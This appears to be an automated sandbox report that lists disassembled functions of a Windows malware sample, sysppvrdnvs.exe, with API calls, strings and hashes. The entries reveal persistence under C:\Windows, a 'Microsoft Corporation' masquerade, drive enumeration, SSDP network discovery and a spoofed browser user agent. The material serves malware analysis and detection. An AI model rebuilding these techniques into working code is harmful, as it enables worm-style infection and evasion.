                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Sleeprecvfrom
                                                                                                                                                                                                      • String ID: HTTP/1.1 200 OK$LOCATION:
                                                                                                                                                                                                      • API String ID: 668330359-3973262388
                                                                                                                                                                                                      • Opcode ID: adc9e1b642c8ef13301026d6139dd454e63dc363d970614d04e973e17512e1fe
                                                                                                                                                                                                      • Instruction ID: e67ba9521a541be798431772fb319970cc3d6429c6b3b7a9c3ce28b53cac335a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: adc9e1b642c8ef13301026d6139dd454e63dc363d970614d04e973e17512e1fe
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E2130B0940218ABDB20CB65DC45BE9BB74AB04308F1085E9EB19B72C0D7B95AD6CF5D
                                                                                                                                                                                                      Function 0040F4B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57networksleepCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040F4C7
                                                                                                                                                                                                      • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F4E6
                                                                                                                                                                                                      • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040F50F
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040F538
                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040F542
                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 0040F54D
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 0040F4C2
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                                                                                                                                                                                      • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                      • API String ID: 2743515581-2960703779
                                                                                                                                                                                                      • Opcode ID: eac7a16544c45e3c29eec32ac406d7a69024a54342cccca2c138cb753e28bf4a
                                                                                                                                                                                                      • Instruction ID: af5d65e8d2fa993cc87ce820da5284d466d7432e490674ab1d3698c460306143
                                                                                                                                                                                                      • Opcode Fuzzy Hash: eac7a16544c45e3c29eec32ac406d7a69024a54342cccca2c138cb753e28bf4a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E7212975A40308BBDB20DF94CC49FEEB7B5AB04705F1084A5EA11AB2C0C7B9AA84CB55
                                                                                                                                                                                                      Function 004077F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71sleepCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Sleep$CacheDeleteEntrywsprintf
                                                                                                                                                                                                      • String ID: %s%s
                                                                                                                                                                                                      • API String ID: 1447977647-3252725368
                                                                                                                                                                                                      • Opcode ID: 2d324eb47764d7037ea5e491b70087558066b5eaf200536a1985154444fa6cc2
                                                                                                                                                                                                      • Instruction ID: a96cc5071c69656b1b6f4b00c6699880e4d6530ea1aa1078cf67c052952084b8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d324eb47764d7037ea5e491b70087558066b5eaf200536a1985154444fa6cc2
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 643116B0C01218DFCB50DFA8DC887EDBBB4BB48304F1085AAE609B6290D7795AC4CF59
                                                                                                                                                                                                      Function 004063E0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55registryCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetLogicalDrives.KERNEL32 ref: 004063E6
                                                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406434
                                                                                                                                                                                                      • RegQueryValueExW.KERNEL32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406461
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0040647E
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00406427
                                                                                                                                                                                                      • NoDrives, xrefs: 00406458
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseDrivesLogicalOpenQueryValue
                                                                                                                                                                                                      • String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
                                                                                                                                                                                                      • API String ID: 2666887985-3471754645
                                                                                                                                                                                                      • Opcode ID: dded7858fb8d287b6bf9178ccf4275851236264e48071ce0b3ae741169170e3e
                                                                                                                                                                                                      • Instruction ID: 87cba227ccd7b938b07588cb79f30f32aa16a0fd6c84a7572e83495dfcaef010
                                                                                                                                                                                                      • Opcode Fuzzy Hash: dded7858fb8d287b6bf9178ccf4275851236264e48071ce0b3ae741169170e3e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D311FCB0E0020A9BDB10CFD0D945BEEBBB4BB08304F118119E615B7280D7B85685CF99
                                                                                                                                                                                                      Function 0040DBE0 Relevance: 9.1, APIs: 6, Instructions: 80threadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040DC04
                                                                                                                                                                                                        • Part of subcall function 0040DCD0: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040DD10
                                                                                                                                                                                                        • Part of subcall function 0040DCD0: CloseHandle.KERNEL32(?), ref: 0040DD29
                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040DC5F
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040DC9C
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040DCA7
                                                                                                                                                                                                      • DuplicateHandle.KERNEL32(00000000), ref: 0040DCAE
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(-00000004), ref: 0040DCC2
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CriticalCurrentHandleProcessSection$CloseCreateDuplicateEnterLeaveObjectSingleThreadWait
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2251373460-0
                                                                                                                                                                                                      • Opcode ID: 2e6c4f739912ed2bc0a02cfb396969f5dbba436efce4c3680658a262bb647ab9
                                                                                                                                                                                                      • Instruction ID: 271f69a92097b1b74c70525479ef463fb32d1143369d808ec26f6a45d53993ac
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e6c4f739912ed2bc0a02cfb396969f5dbba436efce4c3680658a262bb647ab9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D31FA74A00208EFDB04DF98D889B9E7BB5EF48314F0085A8E906A7391D774EA95CF94
                                                                                                                                                                                                      Function 00401200 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 106networkCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memcpy.NTDLL(00000004,00000000,?,?), ref: 00401258
                                                                                                                                                                                                      • htons.WS2_32(?), ref: 00401281
                                                                                                                                                                                                      • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 004012A9
                                                                                                                                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004012BE
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExchangeInterlockedhtonsmemcpysendto
                                                                                                                                                                                                      • String ID: pdu
                                                                                                                                                                                                      • API String ID: 2164660128-2320407122
                                                                                                                                                                                                      • Opcode ID: 7007df3cd78c05f6c364500769b3b78794ef507e39daca42a47d869b9814613d
                                                                                                                                                                                                      • Instruction ID: 05dd75d8116292c76d11c3cc90d45d23dbf78b8bb9632d9a28891a4d74dcab7a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7007df3cd78c05f6c364500769b3b78794ef507e39daca42a47d869b9814613d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0731B3762083009BC710DF69D880A9BBBF4AFC9714F04457EFD9897381D6349914C7AB
                                                                                                                                                                                                      Function 00406360 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetDriveTypeW.KERNEL32(?c@), ref: 0040636D
                                                                                                                                                                                                      • QueryDosDeviceW.KERNEL32(?c@,?,00000208), ref: 004063AC
                                                                                                                                                                                                      • StrCmpNW.SHLWAPI(?,\??\,00000004), ref: 004063C4
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DeviceDriveQueryType
                                                                                                                                                                                                      • String ID: ?c@$\??\
                                                                                                                                                                                                      • API String ID: 1681518211-744975932
                                                                                                                                                                                                      • Opcode ID: f7d2f09f959af449ec867411dc7ba934a04d8b9c93c7b8ac7040ad7b5d155416
                                                                                                                                                                                                      • Instruction ID: e6efffa98ab35b62633249d18dd791fc9affcc5f03e1fdb0b50d0aac4f7d71b0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: f7d2f09f959af449ec867411dc7ba934a04d8b9c93c7b8ac7040ad7b5d155416
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6101F474A4021CEBCB20CF55DD497DD7774AB04714F00C0BAAA06A7280D6759FD5CF99
                                                                                                                                                                                                      Function 00407390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 22memoryCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CoInitializeEx.OLE32(00000000,00000002,?,?,004083D7), ref: 00407398
                                                                                                                                                                                                      • SysAllocString.OLEAUT32(C:\Windows\sysppvrdnvs.exe), ref: 004073A3
                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 004073C8
                                                                                                                                                                                                        • Part of subcall function 004073E0: SysFreeString.OLEAUT32(00000000), ref: 004075F8
                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 004073C2
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • C:\Windows\sysppvrdnvs.exe, xrefs: 0040739E
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: String$Free$AllocInitializeUninitialize
                                                                                                                                                                                                      • String ID: C:\Windows\sysppvrdnvs.exe
                                                                                                                                                                                                      • API String ID: 459949847-2879333202
                                                                                                                                                                                                      • Opcode ID: d549018ca7281a3a12c42c42db4c5aa0698fc19bb076c2a4b3e2f7f0a4b3168e
                                                                                                                                                                                                      • Instruction ID: 94d3ecd3e534f0c2973a063d63be5db40503c7f445082467247c405133df6831
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d549018ca7281a3a12c42c42db4c5aa0698fc19bb076c2a4b3e2f7f0a4b3168e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FEE01275944208FBD7049FA0ED0EB9D77649B04341F1041A5FD05A22A1DAF56E80D755
                                                                                                                                                                                                      Function 0040F1F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28fileCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateFileW.KERNEL32(00406FA0,80000000,00000001,00000000,00000003,00000000,00000000,00406FA0), ref: 0040F210
                                                                                                                                                                                                      • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040F225
                                                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 0040F232
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: File$CloseCreateHandleSize
                                                                                                                                                                                                      • String ID: .Wu
                                                                                                                                                                                                      • API String ID: 1378416451-3424199868
                                                                                                                                                                                                      • Opcode ID: 40331b06137dd1b3e9361709e89bde31eef538c005570258d90ec78dd49f2017
                                                                                                                                                                                                      • Instruction ID: 7e163f13d574deee43add6bab66e88a36a5285de070472799180e575aa2043d7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 40331b06137dd1b3e9361709e89bde31eef538c005570258d90ec78dd49f2017
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0F03774A40308FBDB20DFA4DC49FCD7B74EB04701F2082A4FA047B2D0D6B55A418B44
                                                                                                                                                                                                      Function 00401100 Relevance: 6.1, APIs: 4, Instructions: 86synchronizationCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • ioctlsocket.WS2_32 ref: 0040112B
                                                                                                                                                                                                      • recvfrom.WS2_32 ref: 0040119C
                                                                                                                                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004011B2
                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,00000001), ref: 004011D3
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExchangeInterlockedObjectSingleWaitioctlsocketrecvfrom
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3980219359-0
                                                                                                                                                                                                      • Opcode ID: df0982d8961dfa7a6cd0b7929aac86f273bc3c16a843d5198fc6f9dd533ca4c4
                                                                                                                                                                                                      • Instruction ID: daf299aa3b87b71fb70ff151311bbfa052327c8c190f043936f27822c7d74034
                                                                                                                                                                                                      • Opcode Fuzzy Hash: df0982d8961dfa7a6cd0b7929aac86f273bc3c16a843d5198fc6f9dd533ca4c4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1621C3B1504301AFD304DF65DC84A6BB7E9EF88314F004A3EF559A6290E774D94887EA
                                                                                                                                                                                                      Function 004073E0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 238COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00407670: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407690
                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 004075F8
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateFreeInstanceString
                                                                                                                                                                                                      • String ID: Microsoft Corporation
                                                                                                                                                                                                      • API String ID: 586785272-3838278685
                                                                                                                                                                                                      • Opcode ID: 803bccba2cddfb0e8a4aae8b96d6d08667bbe6654a4f0d67ac19fa841d2eca73
                                                                                                                                                                                                      • Instruction ID: e42f15a5a8f3a5930d9f1f6311551bcb6c6e46ad7cdc057207f56e8781896ff9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 803bccba2cddfb0e8a4aae8b96d6d08667bbe6654a4f0d67ac19fa841d2eca73
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5191FB75E0450AAFCB14DB98CC94EAFB7B5BF48300F208169E505B73A0D735AE42CB66
                                                                                                                                                                                                      Function 0040E0C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CoInitializeEx.COMBASE(00000000,00000002,?,?,?,004083D2), ref: 0040E0CA
                                                                                                                                                                                                        • Part of subcall function 0040E190: socket.WS2_32(00000002,00000002,00000011), ref: 0040E1AA
                                                                                                                                                                                                        • Part of subcall function 0040E190: htons.WS2_32(0000076C), ref: 0040E1E0
                                                                                                                                                                                                        • Part of subcall function 0040E190: inet_addr.WS2_32(239.255.255.250), ref: 0040E1EF
                                                                                                                                                                                                        • Part of subcall function 0040E190: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040E20D
                                                                                                                                                                                                        • Part of subcall function 0040E190: bind.WS2_32(000000FF,?,00000010), ref: 0040E243
                                                                                                                                                                                                        • Part of subcall function 0040E190: lstrlenA.KERNEL32(X#A,00000000,?,00000010), ref: 0040E25C
                                                                                                                                                                                                        • Part of subcall function 0040E190: sendto.WS2_32(000000FF,X#A,00000000), ref: 0040E26B
                                                                                                                                                                                                        • Part of subcall function 0040E190: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040E285
                                                                                                                                                                                                        • Part of subcall function 0040E400: SysFreeString.OLEAUT32(00000000), ref: 0040E4DB
                                                                                                                                                                                                        • Part of subcall function 0040E400: SysFreeString.OLEAUT32(00000000), ref: 0040E4E5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                                                                                                                                                                                      • String ID: TCP$UDP
                                                                                                                                                                                                      • API String ID: 1519345861-1097902612
                                                                                                                                                                                                      • Opcode ID: 4d93ce47139e5fe62163282bdde6dfb132a2b2f81b545c1a314b9c0cb3165857
                                                                                                                                                                                                      • Instruction ID: 4536849a39b1ff6f82dd019fff268beff13b49d9c24eb1714a693627677867a5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d93ce47139e5fe62163282bdde6dfb132a2b2f81b545c1a314b9c0cb3165857
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C511B4B4E00208EBDB00EFD6DC45BAE7375AB44708F10896AE5047B2C2D6799E21CB89
                                                                                                                                                                                                      Function 0040D550 Relevance: 4.6, APIs: 3, Instructions: 120COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 0040D55C
                                                                                                                                                                                                      • InterlockedIncrement.KERNEL32(000000FF), ref: 0040D591
                                                                                                                                                                                                      • InterlockedDecrement.KERNEL32(000000FF), ref: 0040D694
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906611683.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_sysppvrdnvs.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Interlocked$DecrementExchangeIncrement
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2813130747-0
                                                                                                                                                                                                      • Opcode ID: 2df816f2dcdd0a9ca9d31617e15265b78adafd30e8d8956d26d521e16ddc9f70
                                                                                                                                                                                                      • Instruction ID: 92f239bb69865f4ea5ccc2fa5ab36589b1b4cdc7d17313df2dab11b9d7d6be27
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2df816f2dcdd0a9ca9d31617e15265b78adafd30e8d8956d26d521e16ddc9f70
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A41C3B5E00208BBDF00EBE4DC45FAF7B755B04304F048569B5057B2C2D679E54487A9
                                                                                                                                                                                                      Function 0040BE30 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 53stringCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • lstrlenA.KERNEL32(Twizt,?,?,?,?,8@,00000000,8@,0040E038,00000000,00000000), ref: 0040BE7C
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000004.00000002.2906429517.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000004.00000002.2905825095.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
